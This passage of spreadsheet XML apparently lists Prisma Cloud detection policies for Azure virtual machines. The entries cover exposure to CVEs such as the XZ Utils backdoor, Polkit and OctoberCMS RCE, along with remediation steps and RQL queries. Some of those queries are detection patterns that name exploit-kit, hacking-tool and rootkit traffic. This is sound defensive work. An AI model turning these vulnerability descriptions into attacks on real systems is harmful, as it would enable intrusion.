      </c>
      <c r="AB2543" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:46</t>
        </is>
      </c>
      <c r="AC2543" t="inlineStr"/>
      <c r="AD2543" t="b">
        <v>1</v>
      </c>
      <c r="AE2543" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2543" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>43196f73-b887-4516-b158-44823a5d76e3</t>
        </is>
      </c>
      <c r="AI2543" t="inlineStr">
        <is>
          <t>8b66c42d-9a56-4a00-8f74-79fbb77ec377</t>
        </is>
      </c>
      <c r="AJ2543" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2543" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2544">
      <c r="A2544" t="inlineStr"/>
      <c r="B2544" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2544" s="2" t="inlineStr"/>
      <c r="D2544" t="inlineStr"/>
      <c r="E2544" t="inlineStr"/>
      <c r="F2544" t="inlineStr"/>
      <c r="G2544" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2544" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2544" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [OctoberCMS, CVE-2021-32648]</t>
        </is>
      </c>
      <c r="L2544" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2544" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2544" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2544" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2544" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2544" t="inlineStr"/>
      <c r="R2544" t="inlineStr"/>
      <c r="S2544" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2544" t="b">
        <v>0</v>
      </c>
      <c r="U2544" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2544" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2544" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [OctoberCMS, CVE-2021-32648]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of OctoberCMS software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the OctoberCMS [CVE-2021-32648] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X254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CVE-2021-32648
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-32648</t>
        </is>
      </c>
      <c r="Y2544" t="inlineStr"/>
      <c r="Z2544" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-32648 - OctocberCMS) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-32648'))</t>
        </is>
      </c>
      <c r="AA2544" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2544" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:47</t>
        </is>
      </c>
      <c r="AC2544" t="inlineStr"/>
      <c r="AD2544" t="b">
        <v>1</v>
      </c>
      <c r="AE2544" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2544" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>ad3e6afc-76c6-42cc-9d3f-5ea290715edb</t>
        </is>
      </c>
      <c r="AI2544" t="inlineStr">
        <is>
          <t>7b0fdec9-add9-465f-a455-3c119cddb66d</t>
        </is>
      </c>
      <c r="AJ2544" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2544" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2545">
      <c r="A2545" t="inlineStr"/>
      <c r="B2545" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2545" s="2" t="inlineStr"/>
      <c r="D2545" t="inlineStr"/>
      <c r="E2545" t="inlineStr"/>
      <c r="F2545" t="inlineStr"/>
      <c r="G2545" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2545" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2545" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (XZ Utils Backdoor, CVE-2024-3094)</t>
        </is>
      </c>
      <c r="L2545" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2545" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2545" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2545" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2545" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2545" t="inlineStr"/>
      <c r="R2545" t="inlineStr"/>
      <c r="S2545" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2545" t="b">
        <v>0</v>
      </c>
      <c r="U2545" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2545" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2545" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known malicious backdoor (Linux XZ Vulnerability, CVE-2024-3094).
CVE-2024-3094 affects XZ Utils and potentially enables unauthorized access through SSH authentication bypass. With a maximum CVSS score of 10.0, it involves malicious code injected into versions 5.6.0 and 5.6.1 of XZ Utils. This backdoor manipulates the liblzma library, which is used for data compression, and allows an attacker to execute arbitrary code (RCE) on the host operating system. This can lead to system compromise, data breaches, and the escalation of privileges to launch further attacks.
The public exposure of Azure Virtual Machines makes them easy targets for attackers aiming to compromise the affected systems. Successful exploitation of the backdoor on these publicly exposed Azure Virtual Machines would allow an attacker to gain full control of the host and potentially move laterally to compromise other resources.
Immediate action is required to remediate the Linux (CVE-2024-3094) backdoor and the public exposure reported for the affected Azure Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2545" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of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to the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
[Vulnerability]
To patch or update vulnerable Software for Version 5.6.0 to 5.6.1 
   Refer below given URL to obtain more details on the vulnerability and fix,
   https://nvd.nist.gov/vuln/detail/CVE-2024-3094</t>
        </is>
      </c>
      <c r="Y2545" t="inlineStr"/>
      <c r="Z2545" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-3094'))</t>
        </is>
      </c>
      <c r="AA2545" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2545" t="inlineStr">
        <is>
          <t>2024-04-26 08:13:58</t>
        </is>
      </c>
      <c r="AC2545" t="inlineStr"/>
      <c r="AD2545" t="b">
        <v>1</v>
      </c>
      <c r="AE2545" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2545" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>f6afde18-c691-4174-9fa0-236651189696</t>
        </is>
      </c>
      <c r="AI2545" t="inlineStr">
        <is>
          <t>9096a5b2-c8d4-47e3-939f-2683b4154b22</t>
        </is>
      </c>
      <c r="AJ2545" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2545" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2546">
      <c r="A2546" t="inlineStr"/>
      <c r="B2546" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2546" s="2" t="inlineStr"/>
      <c r="D2546" t="inlineStr"/>
      <c r="E2546" t="inlineStr"/>
      <c r="F2546" t="inlineStr"/>
      <c r="G2546" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2546" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2546" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [Polkit, CVE-2021-4034]</t>
        </is>
      </c>
      <c r="L2546" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2546" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2546" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2546" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2546" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2546" t="inlineStr"/>
      <c r="R2546" t="inlineStr"/>
      <c r="S2546" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2546" t="b">
        <v>0</v>
      </c>
      <c r="U2546" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2546" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2546" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2021-4034].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Polkit [CVE-2021-4034] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X254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CVE-2021-4034
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-4034</t>
        </is>
      </c>
      <c r="Y2546" t="inlineStr"/>
      <c r="Z2546" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-4034'))</t>
        </is>
      </c>
      <c r="AA2546" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2546" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2546" t="inlineStr"/>
      <c r="AD2546" t="b">
        <v>1</v>
      </c>
      <c r="AE2546" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2546" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>4f57273f-a0aa-4703-a7bd-8952d84b1cab</t>
        </is>
      </c>
      <c r="AI2546" t="inlineStr">
        <is>
          <t>6ed4f96f-1d1a-4f2e-a985-f38b351e4469</t>
        </is>
      </c>
      <c r="AJ2546" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2546" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2547">
      <c r="A2547" t="inlineStr"/>
      <c r="B2547" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2547" s="2" t="inlineStr"/>
      <c r="D2547" t="inlineStr"/>
      <c r="E2547" t="inlineStr"/>
      <c r="F2547" t="inlineStr"/>
      <c r="G2547" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2547" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2547" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable Azure Virtual Machine [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L2547" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2547" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2547" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2547" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2547" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2547" t="inlineStr"/>
      <c r="R2547" t="inlineStr"/>
      <c r="S2547" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2547" t="b">
        <v>0</v>
      </c>
      <c r="U2547" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2547" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2547" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines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Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2547"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2547" t="inlineStr"/>
      <c r="Z2547" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2547" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2547" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:54</t>
        </is>
      </c>
      <c r="AC2547" t="inlineStr"/>
      <c r="AD2547" t="b">
        <v>1</v>
      </c>
      <c r="AE2547" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2547" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>c74c9c8a-6a07-4f8e-8dcb-937b9efb26c5</t>
        </is>
      </c>
      <c r="AI2547" t="inlineStr">
        <is>
          <t>89bd513c-39ba-4664-ab00-50ca0e68ccb2</t>
        </is>
      </c>
      <c r="AJ2547" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2547" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2548">
      <c r="A2548" t="inlineStr"/>
      <c r="B2548" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2548" s="2" t="inlineStr"/>
      <c r="D2548" t="inlineStr"/>
      <c r="E2548" t="inlineStr"/>
      <c r="F2548" t="inlineStr"/>
      <c r="G2548" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2548" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2548" t="inlineStr">
        <is>
          <t>Potentially nefarious hacking tools activity detected on Azure Virtual machine with public serial console access</t>
        </is>
      </c>
      <c r="L2548" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2548" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2548" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2548" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2548" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2548" t="inlineStr"/>
      <c r="R2548" t="inlineStr"/>
      <c r="S2548" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2548" t="b">
        <v>0</v>
      </c>
      <c r="U2548" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2548" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2548" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that have public serial console access and are connected with remote systems known for hacking tool activities.
Public serial console access on Azure Virtual machine could allow malicious actors to remotely exploit and get initial access to the instance. Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks.
Immediate attention is required to investigate hacking tool activities, disable/restrict serial console permissions, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2548" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to Virtual machines
3. Click on the reported Virtual machine
4. Under Help section, Click on 'Boot diagnostics'
5. Click on 'Settings'
6. Set Status to 'Disable'
7. Clcik on Apply to save your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548" t="inlineStr"/>
      <c r="Z2548" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual machine configured with public IP and serial console access') and ('Traffic to a suspicious IP address associated with Exploit Kit activity' or 'Traffic from a suspicious IP address associated with Exploit Kit activity' or 'Traffic to a suspicious IP address associated with Hacking Tool activity' or 'Traffic from a suspicious IP address associated with Hacking Tool activity' or 'Traffic to a suspicious IP address associated with Rootkit activity' or 'Traffic from a suspicious IP address associated with Rootkit activity'))</t>
        </is>
      </c>
      <c r="AA2548" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2548" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2548" t="inlineStr"/>
      <c r="AD2548" t="b">
        <v>1</v>
      </c>
      <c r="AE2548" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2548" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>9f51e334-98c8-4ea3-bea2-bb4529032f31</t>
        </is>
      </c>
      <c r="AI2548" t="inlineStr">
        <is>
          <t>5a31b8e6-cdcd-42ce-9c5b-dd949233f93d</t>
        </is>
      </c>
      <c r="AJ2548" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2548" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2549">
      <c r="A2549" t="inlineStr"/>
      <c r="B2549" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2549" s="2" t="inlineStr"/>
      <c r="D2549" t="inlineStr"/>
      <c r="E2549" t="inlineStr"/>
      <c r="F2549" t="inlineStr"/>
      <c r="G2549" t="b">
        <v>1</v>
      </c>
      <c r="H25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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2549" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2549" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine [Linux Kernel, CVE-2022-47939]</t>
        </is>
      </c>
      <c r="L2549" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2549" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2549" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2549" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2549" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2549" t="inlineStr"/>
      <c r="R2549" t="inlineStr"/>
      <c r="S2549" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2549" t="b">
        <v>0</v>
      </c>
      <c r="U2549" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2549" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2549" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-47939].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Linux [CVE-2022-47939] vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2549"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CVE-2022-47939
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-47939</t>
        </is>
      </c>
      <c r="Y2549" t="inlineStr"/>
      <c r="Z2549" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-47939'))</t>
        </is>
      </c>
      <c r="AA2549" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2549" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2549" t="inlineStr"/>
      <c r="AD2549" t="b">
        <v>1</v>
      </c>
      <c r="AE2549" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2549" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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49" t="inlineStr">
        <is>
          <t>e6005d71-e9bd-43d4-b7d3-c0413eb4ec4d</t>
        </is>
      </c>
      <c r="AI2549" t="inlineStr">
        <is>
          <t>06cc2f75-d283-4a82-9f23-a382b2d27ec7</t>
        </is>
      </c>
      <c r="AJ2549" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2549" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2550">
      <c r="A2550" t="inlineStr"/>
      <c r="B2550" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2550" s="2" t="inlineStr"/>
      <c r="D2550" t="inlineStr"/>
      <c r="E2550" t="inlineStr"/>
      <c r="F2550" t="inlineStr"/>
      <c r="G2550" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2550" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2550" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [OpenSSL, CVE-2022-3602]</t>
        </is>
      </c>
      <c r="L2550" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2550" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2550" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2550" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2550" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2550" t="inlineStr"/>
      <c r="R2550" t="inlineStr"/>
      <c r="S2550" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2550" t="b">
        <v>0</v>
      </c>
      <c r="U2550" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2550" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2550" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3602].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OpenSSL [CVE-2022-3602] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X255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CVE-2022-3602
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3602</t>
        </is>
      </c>
      <c r="Y2550" t="inlineStr"/>
      <c r="Z2550" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3602'))</t>
        </is>
      </c>
      <c r="AA2550" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2550" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2550" t="inlineStr"/>
      <c r="AD2550" t="b">
        <v>1</v>
      </c>
      <c r="AE2550" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2550" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>4b9b5bd5-0017-440f-93e4-be5477783acc</t>
        </is>
      </c>
      <c r="AI2550" t="inlineStr">
        <is>
          <t>7eddf97f-e1e4-4aee-968d-455560f5274e</t>
        </is>
      </c>
      <c r="AJ2550" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2550" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2551">
      <c r="A2551" t="inlineStr"/>
      <c r="B2551" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2551" s="2" t="inlineStr"/>
      <c r="D2551" t="inlineStr"/>
      <c r="E2551" t="inlineStr"/>
      <c r="F2551" t="inlineStr"/>
      <c r="G2551" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2551" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2551" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to malware in Azure Virtual Machine with risky permissions</t>
        </is>
      </c>
      <c r="L2551" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M2551" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2551" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2551" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2551" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2551" t="inlineStr"/>
      <c r="R2551" t="inlineStr"/>
      <c r="S2551" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2551" t="b">
        <v>0</v>
      </c>
      <c r="U2551" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2551" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2551" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are affected by malware or grayware and have permissions that could potentially lead to privilege escalation.
The detection of grayware or malware within the virtual machines poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. This intrusion could lead to the exploitation of sensitive information and create pathways for further infiltration across the cloud environment. The risky permissions on the virtual machine further help the attackers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remediate the malware or grayware reported for the virtual machines as soon as possible and review risky permissions, remove unwanted permissions assigned to the virtual machines, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X2551"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51" t="inlineStr"/>
      <c r="Z2551" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Azure VM associated with entities that have risky permissions'))</t>
        </is>
      </c>
      <c r="AA2551" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2551" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC2551" t="inlineStr"/>
      <c r="AD2551" t="b">
        <v>1</v>
      </c>
      <c r="AE2551" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2551" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>3df3bf2e-3b8b-45a6-ba4a-bb357c38e740</t>
        </is>
      </c>
      <c r="AI2551" t="inlineStr">
        <is>
          <t>c50efe82-2447-472d-9ae4-bed0c02926fd</t>
        </is>
      </c>
      <c r="AJ2551" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2551" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
